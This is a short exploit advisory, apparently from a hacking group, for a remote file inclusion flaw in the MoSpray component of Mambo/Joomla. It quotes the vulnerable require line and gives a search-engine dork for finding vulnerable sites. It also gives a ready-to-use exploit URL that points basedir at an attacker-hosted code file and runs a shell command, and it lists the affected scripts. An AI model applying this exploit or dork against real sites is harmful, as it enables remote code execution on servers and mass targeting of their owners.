[Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]
>>> Kurdish Security
>>> MoSpray Remote File Include Vulnerability
>>> Original Advisory :
http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : MoSpray
>>> Site : http://www.caneblu.com
>>> Thanx :
>>> kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca
>>> and other my friends
codes
require("$basedir/components/com_mospray/lang/$lang/admin.php");
d0rkiz : allinurl:"com_mospray"
http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?&cmd=id
Used link :]
admin.php
details.php
modify.php
newgroup.php
newtask.php
rss.php
e0f